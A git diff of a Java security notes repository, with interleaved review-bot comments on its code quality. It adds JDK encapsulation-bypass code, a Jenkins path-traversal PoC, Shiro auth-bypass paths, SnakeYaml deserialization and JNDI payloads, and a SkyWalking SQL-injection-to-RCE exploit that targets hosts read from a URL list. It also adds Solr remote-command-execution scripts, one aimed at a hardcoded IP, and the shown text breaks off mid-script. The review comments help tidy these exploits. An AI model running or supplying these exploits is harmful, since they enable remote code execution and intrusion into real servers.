+ byte[] classBuffer = readInputStream(reflectionClass.getResourceAsStream("Reflection.class"));
+ //定义一个类,但不让类加载器知道它。
+ Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null);
+
+ Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap");
+ //不需要
+ //Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap");
+
+ if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){
+ unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap());
+ }
+ //if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){
+ // unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap());
+ //}
+ }
+ public static void main(String[] args) throws Exception{
+ //绕过Java 反射过滤获取ClassLoader私有字段
+ //ClassLoader.class.getDeclaredField("parent");//在之前反射会报错
+ new bypass().bypassReflectionFilter();
+ ClassLoader.class.getDeclaredField("parent");//在之后反射可以bypass
+ }
+}
+```
+参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java
+
+jdk>16
+
+jdk17 bypass module
+
+https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/
+
+https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java
+
+在jdk17使用反序列化的时候发现要报错
+
+```
+InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed
+```
+
+
+
+
+限制了
+
+
+
+
+限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated
+
+## 需要bypass
+
+```
+按照提案的说明,被严格限制的这些内部 API 包括:
+
+java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。
+sun.* 下的所有类及其成员都是内部 API。
+绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。
+```
+
+**code**
+
+```java
+
+import sun.misc.Unsafe;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.util.ArrayList;
+
+/**
+ * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated
+ */
+public class BypassModule {
+ public static void main(String[] args) throws Exception {
+ final ArrayList classes = new ArrayList<>();
+ classes.add(Class.forName("java.lang.reflect.Field"));
+ classes.add(Class.forName("java.lang.reflect.Method"));
+ Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
+ classes.add(aClass);
+ new BypassModule().bypassModule(classes);
+ aClass.newInstance();
+ }
+
+ public void bypassModule(ArrayList classes){
+ try {
+ Unsafe unsafe = getUnsafe();
+ Class currentClass = this.getClass();
+ try {
+ Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]);
+ if (getModuleMethod != null) {
+ for (Class aClass : classes) {
+ Object targetModule = getModuleMethod.invoke(aClass, new Object[]{});
+ unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule);
+ }
+ }
+ }catch (Exception e) {
+ }
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ }
+
+ private static Method getMethod(Class clazz,String methodName,Class[] params) {
+ Method method = null;
+ while (clazz!=null){
+ try {
+ method = clazz.getDeclaredMethod(methodName,params);
+ break;
+ }catch (NoSuchMethodException e){
+ clazz = clazz.getSuperclass();
+ }
+ }
+ return method;
+ }
+
+ private static Unsafe getUnsafe() {
+ Unsafe unsafe = null;
+ try {
+ Field field = Unsafe.class.getDeclaredField("theUnsafe");
+ field.setAccessible(true);
+ unsafe = (Unsafe) field.get(null);
+ } catch (Exception e) {
+ throw new AssertionError(e);
+ }
+ return unsafe;
+ }
+}
+```
+
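Review bot: `BypassModule.bypassModule` swallows every exception in its inner `catch (Exception e) {}` (and `readInputStream` in the first snippet does the same), so when the `Unsafe` write fails the caller only learns about it later as an `IllegalAccessException` from `aClass.newInstance()` with no hint that the bypass did not run; print or rethrow there, e.g. `} catch (Exception e) { throw new IllegalStateException("module bypass failed", e); }`. The loop over `classes` also writes the same `module` slot of `currentClass` on every iteration, so after it returns only the last entry's module (here `TemplatesImpl`'s) is in effect — if that is intended, a single target class is a clearer API than a list; if not, this is a bug. Two caveats for the headings: `Unsafe.defineAnonymousClass` used by `bypassReflectionFilter` was, to my knowledge, removed in JDK 17, so the first snippet is JDK 12–16 only and the `jdk>12` heading should say so, and both snippets rely on `sun.misc.Unsafe`, which is exactly the kind of internal API the quoted encapsulation proposal targets, so they may stop working in a later release.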
diff --git a/Jdk/dnsrebinding/Readme.md b/Jdk/dnsrebinding/Readme.md
new file mode 100644
index 0000000..cf62f1a
--- /dev/null
+++ b/Jdk/dnsrebinding/Readme.md
@@ -0,0 +1,13 @@
+# java rebinding
+
+http://www.loongten.com/2020/02/26/dns-rebinding-bypass
+
+http://www.lpnote.com/2018/11/23/java-dns-cache/
+
+https://www.xmanblog.net/java-dns-rebinding-ssrf/
+
+https://paper.seebug.org/390/
+
+https://powerdns.org/hello-dns/
+
+http://www.ruanyifeng.com/blog/2016/06/dns.html
diff --git a/Jenkins/Readme.md b/Jenkins/Readme.md
new file mode 100644
index 0000000..3dcfc1a
--- /dev/null
+++ b/Jenkins/Readme.md
@@ -0,0 +1,23 @@
+# Jenkins
+
+## CVE-2018-1999002
+poc
+```
+GET /plugin/credentials/.ini HTTP/1.1
+Host:
+Accept-Language: ../../../../../../../../windows/win
+
+GET /plugin/credentials/.txt HTTP/1.1
+Host:
+Accept-Language: ../../../../../../../../firebasky
+```
+
+[Jenkins 任意文件读取漏洞复现与分析-CVE-2018-1999002](https://chybeta.github.io/2018/08/07/Jenkins-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1999002%E3%80%91/)
+
+linux 下利用难度大 必须找一个存在`_`的目录
+
+
+
+
+## 插件问题 xxe/xstream 反序列化
+https://github.com/Firebasky/ctf-Challenge/tree/main/2021_xyb_easyJenkins
diff --git a/Jetty/Readme.md b/Jetty/Readme.md
new file mode 100644
index 0000000..5405b5c
--- /dev/null
+++ b/Jetty/Readme.md
@@ -0,0 +1,7 @@
+# Jetty
+
+好文章:
+
+https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/
+
+https://xz.aliyun.com/t/10039
diff --git a/MyBatis/Readme.md b/MyBatis/Readme.md
new file mode 100644
index 0000000..473dddc
--- /dev/null
+++ b/MyBatis/Readme.md
@@ -0,0 +1,3 @@
+# MyBatis
+
++ [CVE-2020-26945 mybatis二级缓存反序列化的分析与复现](https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&mid=2247484196&idx=1&sn=735666b28cff6e6552d8f3e16b1be9a5&chksm=fa8b1ebccdfc97aa80b6103587fd418b63c6b0d290cd4229ccc999b3706fe4f325595049a7ce&mpshare=1&scene=23&srcid=1013pFDy9OUsVb24733hEAhA&sharer_sharetime=1602582161965&sharer_shareid=8a8448ee03016e30de742559b7359a01%23rd) 简单的说就是mybatis为了缓解多次查询而开启的缓存,如果可以修改缓存的内容就可以将其反序列化。[CVE-2020-26945漏洞](https://www.anquanke.com/post/id/219457)
diff --git a/RASP/Readme.md b/RASP/Readme.md
new file mode 100644
index 0000000..fc2ac3f
--- /dev/null
+++ b/RASP/Readme.md
@@ -0,0 +1,61 @@
+# RASP
+
+Runtime application self-protection
+
+它是一种新型应用安全保护技术,它将保护程序像疫苗一样注入到应用程序中,应用程序融为一体,能实时检测和阻断安全攻击,使应用程序具备自我保护能力,当应用程序遭受到实际攻击伤害,就可以自动对其进行防御,而不需要进行人工干预。
+
+
+
+RASP技术可以快速的将安全防御功能整合到正在运行的应用程序中,它拦截从应用程序到系统的所有调用,确保它们是安全的,并直接在应用程序内验证数据请求。Web和非Web应用程序都可以通过RASP进行保护。该技术不会影响应用程序的设计,因为RASP的检测和保护功能是在应用程序运行的系统上运行的。
+
+### 使用
+
+https://github.com/baidu/openrasp
+
+安装:java -jar RaspInstall.jar -install tomcat目录
+
+配置环境变量: 新建 CATALINE_HOME 值为tomcat目录
+
+在tomcat目录的bin下执行cataline.bat run
+
+测试curl -v 127.0.0.1:8888 |grep OpenRASP
+
+服务器的响应 X-Protected-By: OpenRASP
+
+### 测试
+
+https://github.com/baidu-security/openrasp-testcases
+
+日志:\rasp\logs\alarm\alarm.log
+
+### 实现
+
+java中是通过Java Agent方式进行实现
+
+**是通过java的agent配合asm对运行的字节码进行了修改,这样就达到了埋点hook的目的。**
+
+PHP是通过开发第php扩展库来进行实现。
+
+.NET是通过IHostingStartup(承载启动)实现
+
+
+
+**RASP技术其实主要就是对编程语言的危险底层函数进行hook**,毕竟在怎么编码转换以及调用,最后肯定会去执行最底层的某个方法然后对系统进行调用。由此可以反推出其hook点,然后使用不同的编程语言中不同的技术对其进行实现。
+
+
+
+### 学习
+
+https://blog.csdn.net/HY1273383167/article/details/116211211 1
+
+https://blog.csdn.net/u011721501/article/details/74990346 1
+
+https://www.freebuf.com/articles/web/197823.html
+
+https://paper.seebug.org/1041/
+
+https://blog.csdn.net/u011721501/article/details/74990346
+
+https://paper.seebug.org/330/
+
+
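Review bot: The install steps under `### 使用` contain two typos that will make the runbook fail: Tomcat's environment variable is `CATALINA_HOME`, not `CATALINE_HOME`, and the start script is `catalina.bat`, not `cataline.bat`. The verification command `curl -v 127.0.0.1:8888 |grep OpenRASP` also will not show the header, because `curl -v` writes response headers to stderr while `grep` reads stdout; use `curl -sI 127.0.0.1:8888 | grep X-Protected-By` or redirect with `curl -v 127.0.0.1:8888 2>&1 | grep OpenRASP`. Minor: "开发第php扩展库" reads as a typo for "开发 php 扩展库".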
diff --git a/README.md b/README.md
index 451b433..907e11b 100644
--- a/README.md
+++ b/README.md
@@ -2,11 +2,49 @@
可能有一部分是java的基础语法
和一些java安全,主要是java安全和java框架漏洞的复现,加一些代码审计
-+ 2021/7/30 [添加了java的一些命令执行shell](shell) 💛 💙 💜 ❤️ 💚
-+ 2021/8/15 [添加了Java日常知识点](java日常) 💛 💙 💜 ❤️ 💚
-+ 2021/8/31 [添加了jackson序列化的exp](jackson) 💛 💙 💜 ❤️ 💚
-+ 2021/9/06 [添加Shiro其他漏洞](Shiro) 💛 💙 💜 ❤️ 💚
-+ 2021/9/06 [添加SnakeYaml序列化漏洞和trick](SnakeYaml) 💛 💙 💜 ❤️ 💚
-+ 2021/9/08 [添加序列化链](java序列化链) 💛 💙 💜 ❤️ 💚
-+ 2021/9/15 [添加java模板注入](java模板注入) 💛 💙 💜 ❤️ 💚
-+ 2021/9/18 [添加java小型框架](java小型框架) 💛 💙 💜 ❤️ 💚
++ 2021/7/30 [添加了java的一些命令执行shell](shell) 💛 💙 💜 ❤️ 💚
++ 2021/8/15 [添加了Java日常知识点](java日常) 💛 💙 💜 ❤️ 💚
++ 2021/8/31 [添加了jackson序列化的exp](jackson) 💛 💙 💜 ❤️ 💚
++ 2021/9/06 [添加Shiro其他漏洞](Shiro) 💛 💙 💜 ❤️ 💚
++ 2021/9/06 [添加SnakeYaml序列化漏洞和trick](SnakeYaml) 💛 💙 💜 ❤️ 💚
++ 2021/9/08 [添加序列化链](java序列化链) 💛 💙 💜 ❤️ 💚
++ 2021/9/15 [添加java模板注入](java模板注入) 💛 💙 💜 ❤️ 💚
++ 2021/9/18 [添加java小型框架](java小型框架) 💛 💙 💜 ❤️ 💚 **添加了渗透的思路**
++ 2021/9/25 [添加java回显](java回显) 💛 💙 💜 ❤️ 💚
++ 2021/10/3 [添加Weblogic漏洞](Weblogic) 💛 💙 💜 ❤️ 💚
++ 2021/10/15 [添加MyBatis的CVE-2020-26945](MyBatis) 💛 💙 💜 ❤️ 💚
++ 2021/10/20 [添加BypassSM](BypassSM) 💛 💙 💜 ❤️ 💚
++ 2021/10/25 [添加Xstream](Xstream) 💛 💙 💜 ❤️ 💚
++ 2021/11/19 [添加Springboot](Springboot) 💛 💙 💜 ❤️ 💚
++ 2021/12/17 [添加Springcloud](Springcolud) 💛 💙 💜 ❤️ 💚
++ 2021/12/17 [添加jbdc](Jdbc) 💛 💙 💜 ❤️ 💚
++ 2021/12/19 [添加Jenkins](Jenkins) 💛 💙 💜 ❤️ 💚
++ 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚
++ 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚
++ 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚
++ 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚
++ 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚
+
+
+## 知识星球
+该知识星球主要是分享java相关的安全知识,绝对精华.里面包含未开放的1day和0day等分享或武器化工具一发入魂
+
+
+
+
+
+## 代学习
+
+[java设计模式](https://www.runoob.com/design-pattern/design-pattern-tutorial.html) :heavy_check_mark:
+[jvm学习]() 正在学习中.
+
+## 说明
+目前该项目更新可能会慢一些,更新的基本上是在[添加了Java日常知识点](java日常)中记录自己感觉有意思的文章和小trick,希望对你有帮助.
+
+如果你遇到了很好的文章非常欢迎提交issues.
+
+
+## Stargazers over time
+
+[](https://starchart.cc/Firebasky/Java)
+
diff --git "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md"
index 59ef745..6073000 100644
--- "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md"
+++ "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md"
@@ -41,6 +41,8 @@ https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#
## CVE-2020-11989
+[Apache Shiro权限绕过漏洞CVE-2020-11989分析](https://www.anquanke.com/post/id/222489)
+
**payload:/admin/%252fxxx**
漏洞产生的原因是因为 Spring 与 Shiro 之间对 url 的处理不同从而导致权限绕过.
@@ -145,13 +147,18 @@ pom.xml 中版本修改为 1.7.0 或及以下即可
/login/..;/admin/
/login/..;/json
+/actuator/;/env/
+/admin/;/xxx
/admin/%3b/xxx
/admin/%252fxxx
/admin/%3Bxx
/admin/%20
```
+## CVE-2022-32532
+[CVE-2022-32532](https://github.com/4ra1n/CVE-2022-32532)
+原理参考[CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473)
>参考:
>
diff --git a/SkyWalking/Readme.md b/SkyWalking/Readme.md
new file mode 100644
index 0000000..8ad9aa3
--- /dev/null
+++ b/SkyWalking/Readme.md
@@ -0,0 +1,12 @@
+# SkyWalking
+
+
+
+> Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。
+
+## sql->RCE
+
+https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw
+
+https://github.com/vulhub/vulhub/blob/master/skywalking/8.3.0-sqli/README.zh-cn.md
+
diff --git a/SkyWalking/tool/exp.py b/SkyWalking/tool/exp.py
new file mode 100644
index 0000000..a5a2272
--- /dev/null
+++ b/SkyWalking/tool/exp.py
@@ -0,0 +1,62 @@
+# -*- coding: utf-8 -*
+# /usr/bin/python3
+# @Author:Firebasky
+
+# https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw
+# https://cloud.tencent.com/developer/article/1939867
+
+import requests
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0",
+ "Accept": "application/json, text/plain, */*",
+ "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+ "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8",
+ "Origin": "http://192.168.18.240:8080", "Connection": "close",
+ "Referer": "http://192.168.18.240:8080/log"}
+
+payload = 'CAFEBABE000000.............'
+ClassName = 'Evil'
+JndiUrl = 'ldap://0.0.0.0:8888'
+
+
+def exp(burp0_url):
+ burp0_json1 = {"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select file_write('"+payload+"','"+ClassName+".class'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}}
+ try:
+ requests.post(burp0_url, headers=burp0_headers, json=burp0_json1, verify=False, allow_redirects=False, timeout=2)
+ except:
+ pass
+ # 触发
+ burp0_json2={"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','"+ClassName+"','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}}
+ try:
+ requests.post(burp0_url, headers=burp0_headers, json=burp0_json2, verify=False, allow_redirects=False, timeout=2)
+ except:
+ pass
+
+
+def jndi(burp0_url):
+ burp0_json = {
+ "query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }",
+ "variables": {"condition": {"endpointId": "1",
+ "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','javax.naming.InitialContext','"+JndiUrl+"','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --",
+ "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL",
+ "stateCode": "1", "traceId": "1"}}}
+ try:
+ requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, allow_redirects=False, timeout=2)
+ except:
+ pass
+
+
+def fileTarget(file):
+ with open(file) as url_txt:
+ urls = url_txt.readlines()
+ for url in urls:
+ url = url.replace('\n', '')
+ jndi(url+'/graphql')
+
+
+if __name__ == '__main__':
+ fileTarget('vulip.txt')
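Review bot: Each `requests.post` in `exp()` and `jndi()` is wrapped in a bare `except:` / `pass`, which swallows every exception including `KeyboardInterrupt` and `SystemExit`, so a timeout, DNS failure or malformed URL is indistinguishable from a completed request; narrow them to `except requests.RequestException as e:` and print or log `e`. `exp()` is never called — `fileTarget` only invokes `jndi` — so it is dead code in this script and should either be wired into `__main__` behind an option or documented as such. The module-level `payload` value is an obvious placeholder with no comment saying so; a one-line `# placeholder value, not real data` above it would avoid confusion. `fileTarget` reads the whole file with `readlines()` and then strips `'\n'` manually; iterating `for url in url_txt:` with `url.strip()` also handles `\r\n` endings and blank lines.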
diff --git a/SkyWalking/tool/scan.py b/SkyWalking/tool/scan.py
new file mode 100644
index 0000000..77d860b
--- /dev/null
+++ b/SkyWalking/tool/scan.py
@@ -0,0 +1,104 @@
+# -*- coding: utf-8 -*
+# /usr/bin/python3
+# @Author:Firebasky
+import argparse
+import threading
+import requests
+import urllib3
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# 利用脚本
+
+result = [] # 结果
+
+info = 'Apache Skywalking 8.3.0 SQL Injection Vulnerability'
+
+
+# 添加
+endpoints = [
+ '/graphql',
+]
+
+
+headers = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+ 'Content-Type': 'application/json',
+ 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454',
+ 'X-Forwarded-For': '127.0.0.1',
+ 'X-Client-IP': '127.0.0.1',
+ 'X-Remote-IP': '127.0.0.1',
+ 'X-Remote-Addr': '127.0.0.1',
+ 'X-Originating-IP': '127.0.0.1',
+}
+
+proxy = {
+ 'http': '127.0.0.1:8080'
+}
+
+
+def save(result):
+ file = open('result.txt', 'w')
+ for line in result:
+ file.write(line + '\n')
+ file.close()
+
+
+def Scan_http(url, socket_proxies):
+ FLAG = False
+ payload = {
+ "query": "query queryLogs($condition: LogQueryCondition) {\r\n queryLogs(condition: $condition) {\r\n total\r\n logs {\r\n serviceId\r\n serviceName\r\n isError\r\n content\r\n }\r\n }\r\n}\r\n",
+ "variables": {"condition": {"metricName": "sqli", "paging": {"pageSize": 10}, "state": "ALL"}}}
+
+ for endpoint in endpoints:
+ try:
+ res = requests.post(url+endpoint, json=payload, headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False)
+ if "sqli" in res.text and res.status_code == 200:
+ FLAG=True
+ result.append(url+' 存在'+info)
+ print(url+'\033[1;31m存在'+info+'\033[0m')
+ break
+ except:
+ pass
+ if not FLAG:
+ print(url+"扫描完成不存在漏洞")
+
+
+def fileTarget(file, socket_proxies):
+ with open(file) as url_txt:
+ urls = url_txt.readlines()
+ for url in urls:
+ url = url.replace('\n', '')
+ Scan_http(url, socket_proxies)
+ save(result)
+
+
+def multiRun(file, socket_proxies):
+ t = threading.Thread(target=fileTarget, args=(file, socket_proxies))
+ t.start()
+ t.join()
+
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description=info+'scanner')
+ parser.add_argument('-f', default=None, help='read target url from file')
+ parser.add_argument('-u', default=None, help='target url')
+ parser.add_argument('-proxy', default=None, help='-proxy socks5://0.0.0.0:8088')
+ args = parser.parse_args()
+ socket_proxies = None
+ if args.proxy:
+ socket_proxies = {
+ 'http': args.proxy
+ }
+ if args.u:
+ Scan_http(args.u, socket_proxies)
+ exit(0)
+ if args.f:
+ multiRun(args.f, socket_proxies)
+ exit(0)
+ else:
+ parser.print_help()
+ exit(0)
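Review bot: `save()` opens `result.txt` without a context manager, so the handle is left open if a `write` raises; use `with open('result.txt', 'w') as file:` and drop the explicit `close()`. The bare `except:` in `Scan_http` hides `KeyboardInterrupt` and every request error, so a host that timed out is reported with the same "扫描完成不存在漏洞" message as one that answered cleanly; catch `requests.RequestException as e` and report it. The `headers` dict carries a literal `ADMINCONSOLESESSION` cookie value and the module-level `proxy` dict is never used — both look like leftovers from a captured request, and session identifiers should not be committed even if they are stale. `multiRun` starts a single thread and immediately `join()`s it, so it runs sequentially despite its name; either document that or call `fileTarget` directly.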
diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md
new file mode 100644
index 0000000..b14e92b
--- /dev/null
+++ b/SnakeYaml/Readme.md
@@ -0,0 +1,33 @@
+# snakeyaml
+
+## 不出网利用
+>通过写文件然后本地加载rce
+
+//todo 写一个工具 去完成 已经完成了
+
+
+https://xz.aliyun.com/t/10655
+
+限制了class,不过存在class bean中有object属性 参考: https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ
+
+加载本地
+```java
+String data2 = "!!javax.script.ScriptEngineManager [\n" +
+ " !!java.net.URLClassLoader [[\n" +
+ " !!java.net.URL [\"file:E:/yaml-payload.jar\"]\n" +
+ " ]]\n" +
+ "]";
+```
+
+## 判断类存在
+```java
+ String poc = "[!!判断的类全类名 []: 0, !!java.net.URL [null, \"http://ixvoxg.dnslog.cn\"]: 1]";
+```
+
+## 其他链 一般是jndi
+
+```
+!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true}
+```
+
+参考: https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E
diff --git a/Solr/README.md b/Solr/README.md
index 2edc0c1..cc7d06c 100644
--- a/Solr/README.md
+++ b/Solr/README.md
@@ -1,4 +1,191 @@
# Apache Solr漏洞
**Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。**
+>Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。
-Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。
+
+https://github.com/Imanfeng/Apache-Solr-RCE
+
+## CVE-2017-12629
+
+[CVE-2017-12629 - Apache Solr XXE & RCE 漏洞分析](https://paper.seebug.org/425/)
+
+```python
+# -*- coding: utf-8 -*
+# /usr/bin/python3
+# @Author:Firebasky
+# xxe and rce
+import requests
+from urllib.parse import quote
+
+ip='101.35.196.173'
+port='8983'
+
+'''
+
+">
+'''
+def xxe(url):
+ exp = "%ext;%ent;]>&data;"
+ text = quote(exp, 'utf-8')
+ burp0_url = "http://"+ip+":"+port+"/solr/demo/select?q="+text+"&wt=xml&defType=xmlparser"
+ get = requests.get(burp0_url)
+ print(get.text)
+
+# 依据漏洞作者所披露的漏洞细节来看,RCE需要使用到SolrCloud Collections API,所以RCE只影响Solrcloud分布式系统。
+# /solr/admin/cores?wt=json 判断
+def rce(cmd):#不稳定,并且不知道路径
+ burp0_url = "http://"+ip+":"+port+"/solr/demo/config"
+ burp0_headers = {"Accept": "*/*", "Accept-Language": "en",
+ "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
+ "Connection": "close"}
+ burp0_json = {
+ "add-listener": {"args": ["-c", cmd], "class": "solr.RunExecutableListener", "dir": "/bin/",
+ "event": "postCommit", "exe": "sh", "name": "newlistener"}}
+ requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
+
+ burp0_json2=[{"id": "test"}]
+ requests.post(burp0_url, headers=burp0_headers, json=burp0_json2)
+
+if __name__ == '__main__':
+ # xxe("http://101.35.196.173:8080/do.dtd")
+ rce("touch /tmp/1")
+```
+
+## CVE-2019-0192
+
+https://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py
+
+## CVE-2019-0193
+
+https://www.yuque.com/tianxiadamutou/zcfd4v/uyceyo#4785516e
+
+```python
+# -*- coding: utf-8 -*
+# /usr/bin/python3
+# @Author:Firebasky
+import requests
+from urllib.parse import quote
+
+def getinfo(remote):
+ burp0_url = remote + "/solr/admin/cores?wt=json"
+ r = requests.get(burp0_url, verify=False, allow_redirects=False)
+ if r.status_code == 200:
+ a = list(r.json()['status'].keys())
+ # ressource = "/solr/" + a[0] + "/config"
+ # print(ressource)
+ return a[0]
+ else:
+ exit(0)
+
+#需要出网
+def exp1(url,info,cmd):
+ burp0_url = url+"/solr/"+info+"/dataimport?_=1647571813629&indent=on&wt=json"
+ burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest",
+ "Content-type": "application/x-www-form-urlencoded", "Connection": "close"}
+ burp0_data = {"command": "full-import", "verbose": "false", "clean": "false", "commit": "true", "debug": "true",
+ "core": "test",
+ "dataConfig": "\n \n \n \n \n \n",
+ "name": "dataimport"}
+ post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
+ print(post.json()['documents'])
+
+def exp2(url,info,cmd):
+ burp0url = url+"/solr/"+info+"/config"
+ headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest",
+ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
+ "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close",
+ "Content-Type": "application/json"}
+ burp0_json = {"set-property": {"requestDispatcher.requestParsers.enableStreamBody": True}}
+ requests.post(burp0url, headers=headers, json=burp0_json)
+
+ exp='''
+
+
+
+
+
+
+
+ '''
+ text = quote(exp, 'utf-8')
